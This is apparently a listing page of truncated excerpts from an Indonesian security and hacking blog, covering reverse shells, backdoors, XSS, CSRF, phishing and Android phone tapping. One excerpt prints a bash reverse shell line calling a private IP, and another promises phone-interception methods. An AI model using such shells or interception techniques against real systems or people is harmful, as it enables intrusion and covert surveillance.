Sebelumnya mau cerita dikit case pada saat saya ingin melakukan backconnect atau Reverse Shell pada Windows Server. Pada kasus ini saya memiliki masa…
Umm,,, Karna beberapa alasan nakanosec tidak bisa update dalam beberapa minggu ini, Tapi hari ini kita dah comeback lagi.. Hari ini kita bakalan bah…
Kali ini nakanosec bakalan bahas tentang cara menggunakan cookie untuk login, artikel ini ditujukan buat temen temen yang belom paham penggunak…
Shell Backdoor adalah file yang ditanamkan oleh attacker ke server pada aktivitas hacking. Biasanya shell backdoor dibuat dengan format php atau a…
CSRF adalah singkatan dari Cross-site request forgery , Kerentanan ini memanfaatkan sesi yang ada tanpa perlindungan token csrf sebagai seranga…
Hello kenalin gua Salman aka Chiper, Dikesempatan kali ini gua bikin write up bounty pertama gua. Cerita tentang gimana caranya bikin report yan…
Host Header Injection adalah kerentanan yang memanfaatkan perubahan host pada request header situs web atau aplikasi web mana yang harus memproses…
Pengertian XSS (Cross Site Scripting) merupakan salah satu jenis serangan injeksi code (code injection attack). XSS dilakukan oleh penyerang d…
Di Episode Ke 3 Mr.robot menggunakan teknik phising untuk melakukan serangan social engineering. Mr robot melakukan clone dan menyisipkan logger di…
Mungkin sudah banyak yang tau atau yang punya tools untuk scanning IP user yang satu jaringan. Walaupun sudah basi tapi tidak ada salahnya untuk be…
Reverse Shell dengan Bash bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 Reverse Shell dengan PERL perl -e 'use Socket;$i="…
Shellshock adalah kerentanan yang ditemukan pada sistem operasi linux pada tahun 2014 (CVE-2014-6271). Shellshock sendiri memanfaatkan kerentan…
Kumpulan Http Status Code: 100 Continue 206 Partial Content 403 Forbidden 300 Multiple Choices 101 Switching Protocols 200 OK 302 Moved Te…
Wordlis t adalah kumpulan banyak kata dalam satu file. Biasanya wordlist sendiri digunakan untuk melakukan bruteforce. Tapi sebanyak apapun word…
Directory Listing (Dirlisting) adalah fungsi server web yang menampilkan daftar semua file ketika tidak ada file indeks, seperti index.php, index…
Mungkin Anda pernah mengalami website yang anda kelola tiba tiba di deface atau diretas oleh seseorang. Perubahan tampilan website dirubah dengan pe…
Clickjacking (User Interface redress attack) adalah teknik jahat untuk menipu pengguna agar mengklik sesuatu yang berbeda dari apa yang dilihat p…
Apa Kalian Mencari teknik bypass 500 Internal Server Error? Ketika Mau Retriv db (enumerate Database) Muncul Error Kode 500
Banyak banget orang yang nanya gimana cara buat nyadap hape atau gadget android.. disini semua yang saya tulis real sesuai apa yang pernah lakuin.…
Karna banyaknya pertanyaan pada postikan di fanspage nakanosec tentang open redirect kali ini kita bakal belajar tentang bug open redirect dan peny…
Session Puzzling adalah kerentanan tingkat aplikasi yang terjadi ketika variabel session aplikasi menggunakan lebih dari satu tujuan. Nama lain da…
Regular Expression (REGEX) adalah konstruksi bahasa untuk mencocokkan teks berdasarkan pola tertentu, terutama untuk kasus-kasus kompleks. Contoh…
PHP Code Injection adalah kerentanan/kelemahan pada sebuah website yang memungkinkan penyerang untuk menyisipkan kode khusus ke dalam mesin scrip…